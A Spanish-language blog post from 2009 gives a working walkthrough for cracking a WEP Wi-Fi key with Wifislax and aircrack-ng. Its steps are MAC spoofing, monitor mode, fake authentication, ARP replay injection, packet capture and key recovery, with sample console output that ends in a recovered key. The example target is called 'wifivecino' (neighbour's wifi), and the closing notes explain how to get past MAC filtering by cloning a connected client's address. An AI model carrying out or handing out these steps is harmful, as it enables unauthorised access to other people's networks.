domingo, 5 de julio de 2009

Desencriptar clave wep con wifislax 3.1

Desencriptar clave wep con wifislax 3.1
(fuente)
(usé una tarjeta usb Ralink rausb0) Las tarjetas de red usb zydas, las reconoce automáticamente. También sirven las tarjetas de red Atheros, pero son más escasas
La denominación rausb, cambiaría por eth0 o wlan0, según sea el caso.

Se verifica en la consola:
# ifconfig
# iwconfig

1.- En este caso hay que forzar el chipset ralink (otras las reconoce automáticamente)
menú inicio--> Wifislax-->Asistencia chipset-->Asistencia chipset Ralink-->Forzar chipset ralink rt73 sobre rt2503

nota importante, se van a ocupar 5 consolas abiertas a la vez.
1.- para hacer los cambios de mac y el airmon-ng
2.- para el airodump-ng
3.- para el primer aireplay-ng,
4.- para el segundo aireplay-ng
5.- para el aircrack-ng

2.- # airodump-ng –w "mi_archivo" rausb0
En las capturas aparecerán los AP y los clientes conectados.
Si no inyecta deberás elegir la mac de un cliente asociado para asignarla a nuestra tarjeta usb.
Las capturas, copiarla en un archivo de texto para tenerla a mano. Ya tienes la información de la red wifi que vas a atacar.
O sea: su nombre(essid), su mac(bssid), su channel(puede ser del 1 al 14, típico es el 1 o el 6)

Detectamos:
su mac: 00:32:E8:8D:6A:8A
su nombre: wifivecino
su canal: channel 6
Detener el airodump. ctrl.+C

3.- Entonces, efectuar el cambio de mi mac address:
# ifconfig rausb0 down
# macchanger –mac 00:01:02:03:04:05 rausb0
[Si no inyecta, necesitarás más adelante anotar(cambiarla por) la mac de un cliente real asociado]
# ifconfig rausb0 up

4.- --> #iwconfig mode monitor rausb0
…o tambien puede ser activada con:
# airmon-ng start rausb0

Se comprueba con:
# iwconfig rausb0, aparecerá en mode monitor, previamente estaba en mode Managed

5.- Antes de inyectar mandaremos con rausb0 un paquete de asociación al AP Objetivo:
# aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h nuestra_MAC rausb0
En nuestro ejemplo:
# aireplay-ng -1 100 -e wifivecino -a 00:32:E8:8D:6A:8A -h 00:11:22:33:44:55 eth0
(esta es una respuesta adecuada, que debiera aparecer en la consola)
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

6.- Después hacer la inyección real:
#aireplay -3 -b [bssid] -e [essid] -h [00:01:02:03:04:05] rausb0
[si no asocia necesitarás la mac de un cliente asociado]
En nuestro ejemplo:
# aireplay-ng -3 -b 00:32:E8:8D:6A:8A -h 00:11:22:33:44:55 eth0
(esta es una respuesta adecuada, que debiera aparecer en la consola)
Saving ARP requests in replay_arp-0219-123051.cap
You should also start airodump-ng to capture replies.
Read 11978 packets (got 7193 ARP requests), sent 3902 packets...

7.- #airodump-ng rausb0 - -channel [canal X] - -bssid[mac del AP] –w mi_archivo.cap
# airodump-ng --bssid 00:32:F5:4D:6E:A0 –channel 6 -w mi_archivo eth0

8.- sobre 30-50 mil paquetes se puede reci{en comenzar a desencriptar la clave con aircrack.
#aircrack-ptw fichero.cap
En nuestro ejemplo: (hay que darle la ruta exacta donde el Airodump guardó los archivos.cap de captura)
#aircrack-ptw /root/mi_archivo-01.cap
(asi responderá cuando encuentre la clave. Si no ocurre, tener paciencia y capturar más paquetes y volver con la misma orden)

Bienvenido a Aircrack PTW v 1.0.0 (Spanish Build 2)
Pagina oficial: http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
Traduccion y mejoras por: Stilo16v (http://www.seguridadwireless.net)

Buscando una nueva tabla
BSSID = 00:32:E8:8D:6A:8A Keyindex=0
Estadísticas para BSSID 00:32:E8:8D:6A:8A Keyindex=0 Paquetes=74070
Clave encontrada con longitud 05: FF FF 43 98 34
Equivalente en ASCII: ËË4s


Notas al margen:
Si no asocia con aireplay-ng -1 0, muy bien se puede deber a un par de cosas.
No tenemos la señal suficiente (esto deberíamos saberlo con Netstumbler o Swscanner), sigue intentándolo, pero te aseguro que la distancia es importante, intenta acercarte.
Si estas seguro de tener señal suficiente, entonces seguramente el AP tenga Filtro Mac, podremos hackearlo igual, con un par de trucos:
Si te fijas airodump tiene dos apartados, uno para APS Objetivos (la parte de arriba) y otra para clientes conectados (la de abajo), cuestión de esperar a que un cliente con una mac válida se conecte al AP Objetivo y genere trafico, de esta forma sabremos que la MAC es valida para el AP, copiaremos esa MAC y cambiaremos la nuestra por la del cliente con este código:
# ifconfig rausb0 hw ether MAC_del cliente autenticado
Ahora debemos comenzar el proceso exactamente igual pero poniendo nuestra "nueva" MAC.

Cuando inyecta Arp pero no suben los Data es casi seguro que es por distancia, no sube o sube muy lento en relación con los paquetes ARP inyectados, es cuestión de distancia, los paquetes enviados al AP no le llegan.

El caso es que el AP al que estamos conectándonos nos desautentica, se soluciona volviendo a asociarse con:
# aireplay-ng -1 0 -e ESSID_AP -a MAC_AP -h nuestra_MAC rausb0

No hay comentarios:

Publicar un comentario